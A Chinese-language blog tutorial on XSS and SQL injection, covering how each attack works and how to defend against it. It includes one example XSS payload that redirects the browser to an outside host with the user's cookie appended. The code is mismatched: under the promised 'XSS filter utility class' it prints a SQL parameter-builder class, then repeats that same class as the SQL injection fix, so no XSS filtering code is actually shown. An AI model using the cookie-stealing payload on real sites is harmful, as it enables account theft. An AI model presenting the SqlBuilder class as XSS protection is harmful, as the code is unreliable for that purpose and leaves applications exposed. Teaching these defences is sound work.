- 1Scapy使用文档中文版_scapy使用教程
- 2基于微信小程序的健身房私教预约管理系统+后台管理系统(SSM+mysql)-JAVA.VUE【毕业设计、论文、源码、开题报告】_健身房预约微信小程序源码
- 3Pytorch深度学习实战笔记_pytorch实战
- 4深入理解Linux 内核追踪机制_linux c库追踪
- 5Linux系统忘记root密码解决方法
- 6springboot210基于Springboot开发的精简博客系统的设计与实现_博客管理系统之首页模块设计与实现研究背景
- 7/proc/meminfo内容详解
- 8chatgpt赋能python:Python科学计数法_python数字科学计数法
- 9mac 命令行输入java,MAC-OS-命令行中实现切换JAVA版本的切换
- 10python机器学习:热门旅游景点数据分析可视化系统+爬虫+预测算法+贝叶斯预测+Flask框架(包含文档+源码+部署教程)计算机毕业设计_基于python的旅游景点数据分析系统
WEB安全:XSS漏洞与SQL注入漏洞介绍及解决方案_sql注入、xss攻击
赞
踩
对web安全方面的知识非常薄弱,这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,希望大家多多提意见。
对于防止sql注入发生,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避免后知后觉的犯下大错,专门参考大量前辈们的心得,小小的总结一下,欢迎大家拍砖啊
一、跨站脚本攻击(XSS)
跨站脚本攻击的原理
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意脚本代码,而程序对于用户输入内容未过滤,当用户浏览该页之时,嵌入其中Web里面的脚本代码会被执行,从而达到恶意攻击用户的特殊目的。
跨站脚本攻击的危害:窃取cookie、放蠕虫、网站钓鱼 ...
跨站脚本攻击的分类主要有:存储型XSS、反射型XSS、DOM型XSS
XSS漏洞是Web应用程序中最常见的漏洞之一。如果您的站点没有预防XSS漏洞的固定方法,那么就存在XSS漏洞。这个利用XSS漏洞的病毒之所以具有重要意义是因为,通常难以看到XSS漏洞的威胁,而该病毒则将其发挥得淋漓尽致。
XSS工作流程
1)恶意用户,在一些公共区域(例如,建议提交表单或消息公共板的输入表单)输入一些文本,这些文本被其它用户看到,但这些文本不仅仅是他们要输入的文本,同时还包括一些可以在客户端执行的脚本。如:
http://xxx.xxx.com.cn/intf/_photos.jsp?callback=<script>window.location.href="http://www.baidu.com?a=" + escape(document.cookie)</script>、参数<script>xxx</script>如果这里没有经过转义处理,则页面中就嵌入了一段script
2)恶意提交这个表单
3)其他用户看到这个包括恶意脚本的页面并执行,获取用户的cookie等敏感信息。
如下情况,请求跳转到百度,并将查询到的cookie值也显示出来了
结果将导致:
更详细的Xss原理等知识请参考园内大拿“小坦克”的这篇文章 Web安全测试之XSS
那我们要如何防御Xss?
一种方法是在表单提交或者url参数传递前,对需要的参数进行过滤,请看如下XSS过滤工具类代码
- import java.util.ArrayList;
- import java.util.HashMap;
- import java.util.List;
- import java.util.Map;
-
- public class SqlBuilder {
- protected StringBuilder sqlBuf = new StringBuilder();
- protected List<Object> values = new ArrayList<Object>();
- protected Map<String, Object> paramMap = new HashMap<String, Object>();
-
- public SqlBuilder appendSql(String sql) {
- sqlBuf.append(sql);
- return this;
- }
-
- public SqlBuilder appendValue(Object value) {
- sqlBuf.append('?');
- values.add(value);
- return this;
- }
-
- public SqlBuilder appendValues(Object[] values) {
- sqlBuf.append('(');
- for (int i = 0, c = values.length; i < c; ++i) {
- sqlBuf.append('?').append(',');
- this.values.add(values[i]);
- }
- int last = sqlBuf.length() - 1;
- if (last > 0 && sqlBuf.charAt(last) == ',') {
- sqlBuf.setCharAt(last, ')');
- }
- return this;
- }
-
- public SqlBuilder appendEqParam(String param, Object value) {
- sqlBuf.append(param).append(" = :").append(param);
- paramMap.put(param, value);
- return this;
- }
-
- public SqlBuilder appendLtParam(String param, Object value) {
- sqlBuf.append(param).append(" < :").append(param);
- paramMap.put(param, value);
- return this;
- }
-
- public SqlBuilder appendGtParam(String param, Object value) {
- sqlBuf.append(param).append(" > :").append(param);
- paramMap.put(param, value);
- return this;
- }
-
- public SqlBuilder appendInParam(String param, Object ... values) {
- if(values == null) {
- return this;
- }
- sqlBuf.append(param).append(" in (");
- int len = values.length;
- for(int i = 0; i < len; i++) {
- if(i != 0) {
- sqlBuf.append(", ");
- }
- sqlBuf.append(":").append(param).append(i);
- paramMap.put(param+i, values[i]);
- }
- sqlBuf.append(")");
- return this;
- }
-
- public SqlBuilder appendLikeParam(String param, Object value) {
- sqlBuf.append(param).append(" like :").append(param);
- paramMap.put(param, "%"+value+"%");
- return this;
- }
-
- public String getSql() {
- return sqlBuf.toString();
- }
-
- public Object[] getValues() {
- return values.toArray();
- }
-
- public Map<String, Object> getParamMap() {
- return paramMap;
- }
- }
乌云网有很多关于xss报错的bug记录,如http://www.wooyun.org/bugs/wooyun-2010-016779
SQL注入漏洞
SQL注入攻击的原理:
使用用户输入的参数拼凑SQL查询语句,使用户可以控制SQL查询语句。详细关于sql注入的信息请参考:SQL注入攻防入门详解
防御方法
- 使用预编译语句,
- 绑定变量
- 使用安全的存储过程
- 检查数据类型
- 使用安全函数
建议方法:不要使用拼接的sql,使用占位符,例如使用JdbcTemplate,
下面给出一种解决方法:用下面的各种函数代替拼接sql的出现
- import java.util.ArrayList;
- import java.util.HashMap;
- import java.util.List;
- import java.util.Map;
-
- public class SqlBuilder {
- protected StringBuilder sqlBuf = new StringBuilder();
- protected List<Object> values = new ArrayList<Object>();
- protected Map<String, Object> paramMap = new HashMap<String, Object>();
-
- public SqlBuilder appendSql(String sql) {
- sqlBuf.append(sql);
- return this;
- }
-
- public SqlBuilder appendValue(Object value) {
- sqlBuf.append('?');
- values.add(value);
- return this;
- }
-
- public SqlBuilder appendValues(Object[] values) {
- sqlBuf.append('(');
- for (int i = 0, c = values.length; i < c; ++i) {
- sqlBuf.append('?').append(',');
- this.values.add(values[i]);
- }
- int last = sqlBuf.length() - 1;
- if (last > 0 && sqlBuf.charAt(last) == ',') {
- sqlBuf.setCharAt(last, ')');
- }
- return this;
- }
-
- public SqlBuilder appendEqParam(String param, Object value) {
- sqlBuf.append(param).append(" = :").append(param);
- paramMap.put(param, value);
- return this;
- }
-
- public SqlBuilder appendLtParam(String param, Object value) {
- sqlBuf.append(param).append(" < :").append(param);
- paramMap.put(param, value);
- return this;
- }
-
- public SqlBuilder appendGtParam(String param, Object value) {
- sqlBuf.append(param).append(" > :").append(param);
- paramMap.put(param, value);
- return this;
- }
-
- public SqlBuilder appendInParam(String param, Object ... values) {
- if(values == null) {
- return this;
- }
- sqlBuf.append(param).append(" in (");
- int len = values.length;
- for(int i = 0; i < len; i++) {
- if(i != 0) {
- sqlBuf.append(", ");
- }
- sqlBuf.append(":").append(param).append(i);
- paramMap.put(param+i, values[i]);
- }
- sqlBuf.append(")");
- return this;
- }
-
- public SqlBuilder appendLikeParam(String param, Object value) {
- sqlBuf.append(param).append(" like :").append(param);
- paramMap.put(param, "%"+value+"%");
- return this;
- }
-
- public String getSql() {
- return sqlBuf.toString();
- }
-
- public Object[] getValues() {
- return values.toArray();
- }
-
- public Map<String, Object> getParamMap() {
- return paramMap;
- }
- }
上面的两种漏洞对于web开发会经常遇到,此外还有拒绝服务攻击漏洞、跨站请求伪造(CSRF)、开放重定向漏洞等等,以后再慢慢学习!!!
